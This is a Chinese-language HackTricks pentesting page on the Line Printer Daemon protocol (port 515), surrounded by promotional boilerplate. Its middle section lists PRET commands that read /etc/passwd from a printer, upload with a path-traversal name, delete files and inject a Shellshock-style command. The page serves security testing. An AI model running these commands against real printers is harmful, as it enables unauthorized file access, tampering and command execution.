mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
47 lines
3.4 KiB
Markdown
47 lines
3.4 KiB
Markdown
<details>
|
||
|
||
<summary><strong>零基础学习 AWS 黑客攻击直至成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
支持 HackTricks 的其他方式:
|
||
|
||
* 如果您希望在 **HackTricks 中看到您的公司广告** 或 **下载 HackTricks 的 PDF 版本**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFT 集合**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 **提交 PR 来分享您的黑客技巧。**
|
||
|
||
</details>
|
||
|
||
|
||
Line Printer Daemon (LPD) 协议最初是在 80 年代的 Berkeley Unix 中引入的(后来由 RFC1179 规范定义)。\
|
||
该守护进程运行在 515/tcp 端口,并可以使用 `lpr` 命令访问。为了打印,客户端发送一个定义作业/用户名的 **控制文件** 和一个包含实际打印数据的 **数据文件**。数据文件的 **输入类型** 可以通过在控制文件中选择 **各种文件格式** 来设置。然而,如何实际处理打印数据取决于 LPD 的实现。一个流行的 Unix-like 操作系统的 LPD 实现是 LPRng。LPD 可以用作部署 **恶意 PostScript** 或 **PJL 打印作业** 的载体。
|
||
|
||
[**PRET**](https://github.com/RUB-NDS/PRET) 包含了 `lpdprint` 和 `lpdtest` 工具**。** 它们是直接向 LPD 兼容打印机打印数据或下载/上传/删除文件等的简约方式:
|
||
```
|
||
lpdprint.py hostname filename
|
||
lpdtest.py hostname get /etc/passwd
|
||
lpdtest.py hostname put ../../etc/passwd
|
||
lpdtest.py hostname rm /some/file/on/printer
|
||
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
|
||
lpdtest.py hostname mail lpdtest@mailhost.local
|
||
```
|
||
如果您想了解更多关于[**黑客打印机的信息,请阅读此页面**](pentesting-printers/)。
|
||
|
||
# Shodan
|
||
|
||
* `端口 515`
|
||
|
||
|
||
<details>
|
||
|
||
<summary><strong>从零开始学习AWS黑客攻击直到成为专家,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
其他支持HackTricks的方式:
|
||
|
||
* 如果您希望在HackTricks上看到您的**公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
|
||
|
||
</details>
|